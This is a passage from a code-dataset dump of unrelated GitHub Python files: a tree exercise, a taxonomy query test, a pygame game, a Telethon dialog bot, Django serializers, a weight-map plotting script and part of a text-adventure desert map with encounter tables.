or -1 if it is absent\n    if raiz is None:\n        return -1\n    if raiz.chave == n:\n        return 0\n    if n > raiz.chave:\n        sub = nivel(raiz.dir, n)\n    else:\n        sub = nivel(raiz.esq, n)\n    return sub + 1 if sub >= 0 else -1\n\nraiz = NodoArvore(40)\nfor i in [10, 60, 50, 70, 30, 20]:\n    inserirABB(raiz, NodoArvore(i))\n\nprint(nivel(raiz, 60))\n","repo_name":"danilosrocha/estrutura-de-dados","sub_path":"Exercícios/Lista 6/Ex 1.py","file_name":"Ex 1.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70742289801","text":"import os\nos.environ[\"WHERE\"] = \"API_TEST\"\nimport unittest\nfrom datanator_query_python.config import config as query_config\nfrom datanator_query_python.query_schema_2 import query_taxon_tree_v2\nimport asyncio\nfrom pprint import pprint\n\n\n\nclass TestQTaxon(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        print(os.getenv(\"WHERE\"))\n        cls.src = query_taxon_tree_v2.QTaxon()\n\n    @classmethod\n    def tearDownClass(cls):\n        os.environ[\"WHERE\"] = \"\"\n\n    def test_get_canon_ancestor(self):\n        _id = 1915648\n        loop = asyncio.get_event_loop()\n        ids, _ = loop.run_until_complete(self.src.get_canon_ancestor(_id, _format='tax_id'))\n        self.assertTrue(2283796 not in ids)\n        self.assertTrue(2157 in ids)\n        _id = \"nonsense\"\n        loop = asyncio.get_event_loop()\n        ids, _ = loop.run_until_complete(self.src.get_canon_ancestor(_id, _format='tax_name'))\n        self.assertEqual([], ids)\n\n    # @unittest.skip(\"for now\")\n    def test_aggregate_distance(self):\n        measured_0 = [{\"canon_anc_ids\": [131567, 2, 1224, 1236, 91347, 543, 590, 28901],\n                      \"tax_name\": \"Salmonella enterica subsp. enterica serovar Newport str. 
CFSAN000907\"}] #tax_id1299189\n        target_0 = 0\n        target_1 = 1227178\n        loop = asyncio.get_event_loop()\n        result_0 = loop.run_until_complete(self.src.aggregate_distance(measured_0, target_0, name_field='tax_name'))\n        self.assertEqual(result_0, measured_0)\n        result_1 = loop.run_until_complete(self.src.aggregate_distance(measured_0, target_1, name_field='tax_name'))\n        self.assertEqual(result_1[0]['taxon_distance']['Salmonella enterica subsp. enterica serovar Newport str. CFSAN001557'], 0)\n        # target is measured's ancestor\n        measured_1 = [{\"canon_anc_ids\": [131567, 2759, 4751, 4890, 4891, 4892, 4893, 4930, 4932],\n                      \"tax_name\": \"Saccharomyces cerevisiae CAT-1\"}]\n        target_2 = 4932  # Saccharomyces cerevisiae\n        result_2 = loop.run_until_complete(self.src.aggregate_distance(measured_1, target_2, name_field='tax_name'))\n        self.assertEqual(result_2[0]['taxon_distance']['Saccharomyces cerevisiae'], 0)\n        self.assertEqual(result_2[0]['taxon_distance']['Saccharomyces cerevisiae CAT-1'], 1)","repo_name":"KarrLab/datanator_query_python","sub_path":"tests/query_schema_2/test_query_taxon_tree_v2.py","file_name":"test_query_taxon_tree_v2.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14143833346","text":"import pygame\nimport random\n\n# Initialize the game\npygame.init()\n\n# screen\nwidth = 1000\nheight = 500\nscreen = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"Tom and Jerry GAME\")\n\n# Game settings\nplayer_start_lives = 5  # changes during the game\nplayer_speed = 5  # does not change\nmouse_speed = 5  # changes\nmouse_speed_acceleration = 0.5  # does not change\nmouse_behind_border = 100  # does not change\nscore = 0  # changes\ncoin_speed = 50\n\nplayer_lives = player_start_lives  # changes\nmouse_curent_speed = mouse_speed\n\n# FPS and clock\nfps = 60\nclock = pygame.time.Clock()\n\n# colors\ndark_yellow = pygame.Color(\"#938f0c\")\nblack = (0,0,0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ngreen = ( 0, 255, 0)\nblue = (0, 0, 255)\n\n# fonts\ngame_font_big = pygame.font.Font(\"fonts/mujfont.ttf\", 50)\ngame_font_middle = pygame.font.Font(\"fonts/mujfont.ttf\", 35)\n\n\n# text\ngame_name = game_font_big.render(\"Tom and Jerry Game\", True, dark_yellow)\ngame_name_rect = game_name.get_rect()\ngame_name_rect.center = (width//2, 30)\n\ngame_over_text = game_font_big.render(\"Game over.\", True, dark_yellow)\ngame_over_text_rect = game_over_text.get_rect()\ngame_over_text_rect.center = (width//2, height//2)\n\ncontinue_text = game_font_middle.render(\"Want to play again? Press any key\", True, dark_yellow)\ncontinue_text_rect = continue_text.get_rect()\ncontinue_text_rect.center = (width//2, height//2 + 40)\n\nvictory_text = game_font_middle.render(\"You won. You got the gold coin\", True, dark_yellow)\nvictory_text_rect = victory_text.get_rect()\nvictory_text_rect.center = (width//2, height//2)\n\n# sounds and background music; -1 means loop forever\npygame.mixer.music.load(\"music/bgmusic.wav\")\npygame.mixer.music.play(-1, 0.0)\nloose_life_sound = pygame.mixer.Sound(\"music/boom.wav\")\n#loose_life_sound.set_volume(0.1)\ncatch_mouse_sound = pygame.mixer.Sound(\"music/zap.wav\")\n#catch_mouse_sound.set_volume(0.1)\n\n\n# images\ncat_image = pygame.image.load(\"img/cat-icon.png\")\ncat_image_rect = cat_image.get_rect()\ncat_image_rect.center = (60, height//2)\n\nmouse_image = pygame.image.load(\"img/mouse.png\")\nmouse_image_rect = mouse_image.get_rect()\nmouse_image_rect.x = width + mouse_behind_border  # left\nmouse_image_rect.y = random.randint(60, height-48)  # top\n\ncoin_image = pygame.image.load(\"img/coin-icon.png\")\ncoin_image_rect = coin_image.get_rect()\ncoin_image_rect.centerx = width - 100  # left\ncoin_image_rect.centery = 60\n\n\n# Main loop\nlets_continue = True\n\nwhile lets_continue:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            lets_continue = False\n\n    # keyboard movement\n    keys = pygame.key.get_pressed()\n    if keys[pygame.K_UP] and cat_image_rect.top > 60:\n        cat_image_rect.y -= player_speed\n    elif keys[pygame.K_DOWN] and cat_image_rect.bottom < height:\n        cat_image_rect.y += player_speed\n\n    # mouse movement\n    if mouse_image_rect.x < 0:\n        player_lives -= 1\n        mouse_image_rect.x = width + mouse_behind_border\n        mouse_image_rect.y = random.randint(60, height - 48)\n        loose_life_sound.play()\n    else:\n        mouse_image_rect.x -= mouse_curent_speed\n\n    # check the coin position\n    if coin_image_rect.left <= 0:\n        screen.blit(victory_text, victory_text_rect)\n        screen.blit(continue_text, continue_text_rect)\n        pygame.display.update()\n        pygame.mixer.music.stop()\n        coin_image_rect.left = width - 100\n\n        pause = True\n        while pause:\n            for event in pygame.event.get():\n                if event.type == pygame.KEYDOWN:\n                    score = 0\n                    player_lives = player_start_lives\n                    mouse_curent_speed = mouse_speed\n                    cat_image_rect.y = height // 2\n                    pause = False\n                    pygame.mixer.music.play(-1, 0.0)\n                elif event.type == pygame.QUIT:\n                    pause = False\n                    lets_continue = False\n\n\n    # collision check\n    if cat_image_rect.colliderect(mouse_image_rect):\n        score += 1\n        mouse_curent_speed += mouse_speed_acceleration\n        mouse_image_rect.x = width + mouse_behind_border\n        mouse_image_rect.y = random.randint(60, height - 48)\n        catch_mouse_sound.play()\n        coin_image_rect.centerx -= coin_speed\n\n    # redraw the screen\n    screen.fill(black)\n\n    # shapes\n    pygame.draw.line(screen, dark_yellow, (0, 60), (width, 60), 2)\n\n    # set up the texts\n    lives_text = game_font_middle.render(f\"Lives: {player_lives}\", True, dark_yellow)\n    lives_text_rect = lives_text.get_rect()\n    lives_text_rect.right = width - 20\n    lives_text_rect.top = 15\n\n    score_text = game_font_middle.render(f\"Score: {score}\", True, dark_yellow)\n    score_text_rect = score_text.get_rect()\n    score_text_rect.left = 20\n    score_text_rect.top = 15\n\n    # texts, display\n    screen.blit(game_name, game_name_rect)\n    screen.blit(score_text, score_text_rect)\n    screen.blit(lives_text, lives_text_rect)\n\n    # images\n    screen.blit(cat_image, cat_image_rect)\n    screen.blit(mouse_image, mouse_image_rect)\n    screen.blit(coin_image, coin_image_rect)\n\n    # check for game over, UPDATE !!!!!\n    if player_lives == 0:\n        screen.blit(game_over_text, game_over_text_rect)\n        screen.blit(continue_text, continue_text_rect)\n        pygame.display.update()\n        
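# stop the background music while the game-over screen waits for a key press\n        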
pygame.mixer.music.stop()\n\n        pause = True\n        while pause:\n            for event in pygame.event.get():\n                if event.type == pygame.KEYDOWN:\n                    score = 0\n                    player_lives = player_start_lives\n                    mouse_curent_speed = mouse_speed\n                    cat_image_rect.y = height//2\n                    pause = False\n                    pygame.mixer.music.play(-1, 0.0)\n                    coin_image_rect.left = width - 100\n                elif event.type == pygame.QUIT:\n                    pause = False\n                    lets_continue = False\n\n\n\n\n    # update\n    pygame.display.update()\n\n    # slow the loop down - clock tick\n    clock.tick(fps)\n\n\n\n\n\n\n\n\n# quit the game\npygame.quit()","repo_name":"KerstynU/Pygame---cat-and-mouse","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1701483690","text":"\"\"\"\nExample of a Telegram bot\n\nusing a conversation (dialog).\nTo enter the dialog, send the /AddUser command.\n\n\"\"\"\n\nimport os\nfrom dotenv import load_dotenv  # pip3 install python-dotenv\nfrom telethon import TelegramClient, events, connection  # pip3 install Telethon\n\ndotenv_path = os.path.join(os.path.dirname(__file__), \".env\")\nprint(dotenv_path)\nif os.path.exists(dotenv_path):\n    load_dotenv(dotenv_path)\napp_api_id = os.getenv(\"TLG_APP_API_ID\")\napp_api_hash = os.getenv(\"TLG_APP_API_HASH\")\napp_name = os.getenv(\"TLG_APP_NAME\")\nbot_token = os.getenv(\"I_BOT_TOKEN\")\nclient = os.getenv(\"TLG_CLIENT\")\nproxy_server = os.getenv(\"TLG_PROXY_SERVER\")\nproxy_port = int(os.getenv(\"TLG_PROXY_PORT\"))\nproxy_key = os.getenv(\"TLG_PROXY_KEY\")\n\nproxy = (proxy_server, proxy_port, proxy_key)\nbot = TelegramClient(app_name, app_api_id, app_api_hash,\n                     connection=connection.ConnectionTcpMTProxyRandomizedIntermediate,\n                     proxy=proxy)\nbot.start(bot_token=bot_token)\n\n# client = []  # client\n\n@bot.on(events.NewMessage(pattern='/start'))\nasync def start(event):\n    \"\"\"Send a message when the command /start is issued.\"\"\"\n    await event.respond('Hi!\\nTo enter the dialog, send the /AddUser command')\n    raise events.StopPropagation\n\n@bot.on(events.NewMessage(pattern='/AddUser'))\nasync def echo(event):\n    # dialog requesting the information needed by the /AddUser command\n    await event.respond(\"Running the /AddUser command\")\n    chat_id = event.chat_id\n    async with bot.conversation(chat_id) as conv:\n        #response = conv.wait_event(events.NewMessage(incoming=True))\n        await conv.send_message(\"Hi! Enter the id of the user \"\\\n            \"who should be granted access to the bot:\")\n        id_new_user = await conv.get_response()\n        id_new_user = id_new_user.message\n        # the user id must be a number\n        while not any(x.isdigit() for x in id_new_user):\n            await conv.send_message(\"The new user's ID is a number. Try again.\")\n            id_new_user = await conv.get_response()\n            id_new_user = id_new_user.message\n        # print(\"id_new_user \", id_new_user)\n        await conv.send_message(f\"Added a new user with ID: {id_new_user}\")\n\ndef main():\n    \"\"\"Start the bot.\"\"\"\n    bot.run_until_disconnected()\n\nif __name__ == '__main__':\n    main()","repo_name":"kaefik/py-template","sub_path":"telegrambot/ex-tlg-bot-conversation.py","file_name":"ex-tlg-bot-conversation.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72756263630","text":"from rest_framework import serializers\n\nfrom e_campus.models import Course\nfrom e_campus.models import Student\nfrom e_campus.models import Enrollment\n\n\nclass CourseSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Course\n        fields = (\"description\", \"duration\", \"holder_image\", \"name\")\n\n\nclass StudentSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Student\n        fields = (\n            \"avatar\",\n            \"name\",\n            \"nickname\",\n            \"phone\",\n        )\n\n\nclass EnrollmentSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Enrollment\n        fields = (\n            \"course\",\n            \"date_close\",\n            \"date_enroll\",\n            \"score\",\n            \"status\",\n            \"student\",\n        )\n","repo_name":"LePiN/virtual_academy","sub_path":"e_academy/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12810796250","text":"import sys\nimport glob\nimport os\nimport ast\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom model_loader import *\n\ndef draw_nn_map_figure(model_dir):\n    ml = ModelLoader(model_dir)\n    _,step,AME = ml.get_scalar('loss/mean_absolute_error_1')\n    _,step,AME_test = ml.get_scalar('loss/mean_absolute_error_test_1')\n\n    plt.suptitle(model_dir)\n    ax = plt.subplot(121)\n    plt.title(\"$w_{in}$\")\n    w_in = ml.get_values_of_variable_by_name('fc_in/weights:0')\n    w_max = np.amax(np.absolute(w_in))\n    #sns.heatmap(w_in, linewidth=0.5, cbar_kws={\"orientation\": \"horizontal\"})\n    im = plt.imshow(w_in, cmap='seismic', interpolation='nearest', vmax=w_max, vmin=-w_max)\n    cbar = fig.colorbar(ax=ax, mappable=im, orientation='horizontal')\n\n    ax = plt.subplot(164)\n    plt.title(\"$b_{in}$\")\n    b_in = ml.get_values_of_variable_by_name('fc_in/biases:0')\n    b_in = np.expand_dims(b_in, axis=1)\n    #sns.heatmap(b_in, linewidth=0.5, xticklabels=False, cbar_kws={\"orientation\": \"horizontal\"})\n    im = plt.imshow(b_in, cmap='seismic', interpolation='nearest')\n    cbar = fig.colorbar(ax=ax, mappable=im, orientation='horizontal')\n\n    ax = plt.subplot(165)\n    plt.title(\"$w_{out}$\")\n    w_out = ml.get_values_of_variable_by_name('fc_out/weights:0')\n    #sns.heatmap(w_out, linewidth=0.5, xticklabels=False, cbar_kws={\"orientation\": \"horizontal\"})\n    im = plt.imshow(w_out, cmap='seismic', interpolation='nearest')\n    cbar = fig.colorbar(ax=ax, mappable=im, orientation='horizontal')\n\n    ax = plt.subplot(166)\n    plt.title(\"$b_{out}$\")\n    b_out = ml.get_values_of_variable_by_name('fc_out/biases:0')\n    b_out = np.expand_dims(b_out, axis=1)\n    #sns.heatmap(b_out, linewidth=0.5, xticklabels=False, yticklabels=False, annot=True, fmt=\"f\", cbar=False)\n    im = plt.imshow(b_out, cmap='seismic', interpolation='nearest')\n    cbar = fig.colorbar(ax=ax, mappable=im, orientation='horizontal')\n\nfrom bash_file_tools import *\n\n# usage: python 
model_loader_nn_maps.py '../logs/nn_logs/features_few/Rc*/z-score/*/*' model_nn_maps/\nmodel_dirs_bash_path = sys.argv[1]\nout_dir = sys.argv[2]\nmodel_dirs = list_bash_files(model_dirs_bash_path)\n\nfig = plt.figure(1, figsize=(16, 8.5))\n\nfor i,model_dir in enumerate(model_dirs):\n fig.clf()\n draw_nn_map_figure(model_dir)\n Rc = model_dir\n fig_save_path = os.path.join(out_dir, \"nn_map_\" + str(i) + \".pdf\")\n fig.savefig(fig_save_path)\n print(fig_save_path, \"saved.\")\n\n\n","repo_name":"EmilBahnsen/bachelor-master","sub_path":"visualization/model_loader_nn_maps.py","file_name":"model_loader_nn_maps.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12810796250","text":"\"\"\"\nFile: TUAAlbanianDesert.py\nAuthor: Ben Gardner\nCreated: December 25, 2013\nRevised: August 26, 2023\n\"\"\"\n\n\nimport random\nfrom TUAStatics import Static\n\n\nclass AlbanianDesert:\n\n name = \"Albanian Desert\"\n audio = \"Duststorm\"\n\n def __init__(self, character):\n self.view = None\n self.imageIndex = None\n self.text = None\n self.menu = None\n self.helpText = None\n self.tempFlag = None\n self.c = character\n self.movementVerb = \"walk\"\n \n if \"Gold Mined\" not in self.c.flags:\n self.c.flags['Gold Mined'] = {1: 0,\n 2: 0,\n 3: 0,\n 4: 0}\n\n wrp1 = self.westernKosovo1\n wrp2 = self.westernKosovo2\n wrp3 = self.westernKosovo3\n wrp4 = self.westernKosovo4\n wrp5 = self.westernKosovo5\n wrp6 = self.romadanVillageEntrance\n wrp7 = self.romadanVillageExit\n scut = self.scutariPassage\n nml1 = self.normal1\n nml2 = self.normal2\n nml3 = self.normal3\n notU = self.notUp\n notD = self.notDown\n notR = self.notRight\n notL = self.notLeft\n upRt = self.upRight\n upLt = self.upLeft\n dnRt = self.downRight\n nooE = self.nookEntrance\n dnLt = self.downLeft\n down = self.down\n left = self.left\n watU = self.waterUp\n watD = self.waterDown\n watR = self.waterRight\n watL = self.waterLeft\n waUR = self.waterDownLeft\n waUL = self.waterDownRight\n waDR = self.waterUpLeft\n waDL = self.waterUpRight\n gld1 = self.goldMine1\n gld2 = self.goldMine2\n gld3 = self.goldMine3\n gld4 = self.goldMine4\n hotC = self.hotCoalsTeacher\n wel1 = self.well1\n wel2 = self.well2\n cast = self.castle\n wal1 = self.wall1\n wal2 = self.wall2\n geys = self.geyser\n paca = None if \"Volcano Ointment\" not in self.c.flags and (\"Oukkar\" in self.c.flags['Kills'] or \"Plugged Geyser\" not in self.c.flags) else self.alpaca\n \n \n self.spots = [\n [None, None, None, None, None, None, None, None, None, None, None, None],\n [None, None, down, None, None, None, None, None, None, None, None, None],\n [None, None, notL, dnLt, None, wrp1, None, None, None, None, None, None],\n [None, None, notL, notR, None, notL, wrp2, None, None, None, None, None],\n [None, scut, nml1, nml2, notU, nml2, nml1, wrp3, wrp4, None, None, None],\n [None, notL, nml2, nml3, nml2, nml1, nml2, nml3, nml2, wrp5, None, None],\n [None, notL, nml3, nml2, nml1, watD, watD, watD, nml1, notR, None, None],\n [None, upRt, hotC, nml1, watR, None, None, None, watL, nml3, dnLt, None],\n [None, None, None, notL, watD, waDL, None, None, waUR, gld1, notR, None],\n [None, None, dnRt, waUL, None, watL, waDL, None, None, waUR, notR, None],\n [None, None, watU, None, None, watL, wel1, waDL, None, None, watU, None],\n [None, None, None, None, waDR, nml3, nml2, watR, None, watD, None, None],\n [None, None, None, waDR, nml3, watD, watD, nml2, watU, nml2, left, None],\n [None, 
None, None, notL, watR, None, None, watL, nml2, notR, None, None],\n [None, None, None, upRt, watR, None, None, watL, nml1, upLt, None, None],\n [None, None, None, None, notL, watU, watU, nml1, notR, None, None, None],\n [None, None, None, None, notL, nml2, gld2, nml2, nml3, dnLt, None, None],\n [None, None, None, None, notL, nml1, nml2, nml3, nml2, upLt, None, None],\n [None, None, None, None, wrp6, wrp6, wrp6, wrp6, wrp6, None, None, None],\n [None, None, None, None, None, None, None, None, None, None, None, None],\n [None, None, None, None, wrp7, wrp7, wrp7, wrp7, wrp7, None, None, None],\n [None, None, None, None, notL, nml1, notD, notD, upLt, None, None, None],\n [None, None, None, None, upRt, nml2, None, None, None, None, None, None],\n [None, None, None, None, None, upRt, cast, notU, notU, left, None, None],\n [None, None, None, None, None, None, None, notL, notR, None, None, None],\n [None, None, None, None, nooE, notU, notU, nml3, nml2, dnLt, None, None],\n [None, None, paca, None, notL, watD, watD, nml2, nml1, gld3, dnLt, None],\n [None, None, geys, notU, watR, None, None, watL, nml2, nml3, upLt, None],\n [None, None, None, upRt, watR, None, None, watL, nml3, upLt, None, None],\n [None, None, None, None, notL, watU, watU, wel2, notR, None, None, None],\n [None, None, None, None, notL, nml2, nml3, nml2, nml1, dnLt, None, None],\n [None, None, None, None, upRt, nml3, nml2, nml1, nml2, notR, None, None],\n [None, None, None, None, None, upRt, gld4, nml2, nml3, upLt, None, None],\n [None, None, None, None, None, None, notL, nml3, notR, None, None, None],\n [None, None, None, None, None, None, upRt, nml2, notR, None, None, None],\n [None, None, None, None, None, None, None, wal1, wal2, None, None, None],\n [None, None, None, None, None, None, None, None, None, None, None, None]]\n \n if self.c.level < 14: # 25%\n e = {'Diggler': 13,\n 'Romadan Horseman': 7,\n 'Warlock': 3}\n elif self.c.level == 14: # 24%\n e = {'Romadan Horseman': 6,\n 'Warlock': 10,\n 'Gold Golem': 6,\n 'Adurbid': 2}\n elif self.c.level == 15: # 23%\n e = {'Warlock': 5,\n 'Gold Golem': 11,\n 'Adurbid': 5,\n 'Dust Dweller': 2}\n elif self.c.level == 16: # 22%\n e = {'Gold Golem': 5,\n 'Adurbid': 10,\n 'Dust Dweller': 5,\n 'Albanian Gladiator': 2}\n elif self.c.level == 17: # 21%\n e = {'Adurbid': 4,\n 'Dust Dweller': 9,\n 'Albanian Gladiator': 4,\n 'Gritty Assailant': 2}\n elif self.c.level == 18: # 20%\n e = {'Dust Dweller': 4,\n 'Albanian Gladiator': 8,\n 'Gritty Assailant': 4,\n 'Shadow Sniper': 2}\n elif self.c.level == 19: # 19%\n e = {'Albanian Gladiator': 4,\n 'Gritty Assailant': 7,\n 'Shadow Sniper': 4,\n 'Shadow Hunter': 2}\n elif self.c.level == 20: # 18%\n e = {'Gritty Assailant': 4,\n 'Shadow Sniper': 6,\n 'Shadow Hunter': 4,\n 'Giant Scorpion1': 2}\n elif self.c.level > 20: # 17%\n e = {'Shadow Sniper': 4,\n 'Shadow Hunter': 5,\n 'Giant Scorpion1': 4,\n 'Manticore': 2}\n\n if self.c.level < 14 or self.c.level > 16:\n e['Gold Golem'] = 2\n\n e['Mirage'] = 4\n \n self.encounters = {wrp1: {},\n wrp2: {},\n wrp3: {},\n wrp4: {},\n wrp5: {},\n wrp6: {},\n wrp7: {},\n scut: {},\n nml1: e,\n nml2: e,\n nml3: e,\n notU: e,\n notD: e,\n notR: e,\n notL: e,\n upRt: e,\n upLt: e,\n dnRt: e,\n nooE: e,\n dnLt: e,\n down: e,\n left: e,\n watU: e,\n watD: e,\n watR: e,\n watL: e,\n waUR: e,\n waUL: e,\n waDR: e,\n waDL: e,\n gld1: e,\n gld2: e,\n gld3: e,\n gld4: e,\n hotC: e,\n wel1: {},\n wel2: {},\n cast: {},\n wal1: {},\n wal2: {},\n geys: {},\n paca: {}\n }\n \n def movementActions(self):\n self.c.ep -= 3\n if 
self.c.ep < 0:\n excess = 0 - self.c.ep\n self.c.ep += excess\n self.c.hp -= excess\n\n def actions(self, newActions=None):\n actions = {'view': self.view,\n 'image index': self.imageIndex,\n 'text': self.text,\n 'menu': self.menu,\n 'italic text': self.helpText}\n if newActions:\n actions.update(newActions)\n return actions\n\n def westernKosovo1(self, selectionIndex=None):\n X = 1\n Y = 5\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def westernKosovo2(self, selectionIndex=None):\n X = 2\n Y = 6\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def westernKosovo3(self, selectionIndex=None):\n X = 3\n Y = 7\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def westernKosovo4(self, selectionIndex=None):\n X = 4\n Y = 7\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def westernKosovo5(self, selectionIndex=None):\n X = 5\n Y = 8\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def romadanVillageEntrance(self, selectionIndex=None):\n X = 2\n Y = 2\n return self.actions({'area': \"Romadan Village\",\n 'coordinates': (X, Y)})\n\n def romadanVillageExit(self, selectionIndex=None):\n X = 2\n Y = 6\n return self.actions({'area': \"Romadan Village\",\n 'coordinates': (X, Y)})\n\n def scutariPassage(self, selectionIndex=None):\n if selectionIndex == 0:\n self.c.flags['Sliding'] = True\n X = 6\n Y = 4\n return self.actions({'area': \"Scutari Peninsula\",\n 'coordinates': (X, Y)})\n self.view = \"travel\"\n self.imageIndex = 0\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Crawling\" in self.c.flags:\n del self.c.flags['Crawling']\n self.text = (\"You crawl up the sand passage.\")\n else:\n self.text = (\"There is a dark, sloping tunnel in the sand dune.\")\n self.menu = [\"Go through the tunnel.\"]\n return self.actions()\n\n def normal1(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 1\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def normal2(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 2\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def normal3(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 3\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def notUp(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 4\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def notDown(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 5\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def notRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 6\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def 
notLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 7\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def upRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 8\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def upLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 9\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def downRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 10\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def nookEntrance(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 0\n self.text = None\n self.helpText = None\n self.menu = []\n \n if selectionIndex == 0:\n return Static.ICA_DATA['Ica 5']\n if \"Oukkar\" in self.c.flags['Kills'] and (self.c.dexterity >= 75 or \"All Access Pass\" in self.c.flags):\n self.text = (\"\\nYou spot a hidden passage up into the dune \"+\n \"that appears to be accessible.\")\n self.menu = [\"Enter the dune.\"]\n elif \"Oukkar\" in self.c.flags['Kills']:\n self.text = (\"\\nYou spot a passage up into the dune \"+\n \"that looks like it may be accessible, were you more \"+\n \"dextrous.\")\n return self.actions()\n\n def downLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 11\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def down(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 13\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def left(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 14\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterUp(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 15\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterDown(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 16\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 17\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 18\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterDownLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 19\n self.text = None\n self.helpText = None\n self.menu = []\n if ( \"Qendresa Albanian Desert Remark\" not in self.c.flags and\n self.c.hasMercenary(\"Qendresa\")):\n self.c.flags['Qendresa Albanian Desert Remark'] = True\n self.text = \"Qendresa: Look what has become of Albania...\"\n return self.actions()\n\n def waterDownRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 20\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterUpLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 21\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterUpRight(self, selectionIndex=None):\n 
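# Each tile handler below follows the same pattern: set view/imageIndex/text/menu,\n        # then return the action dict built by self.actions().\n        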
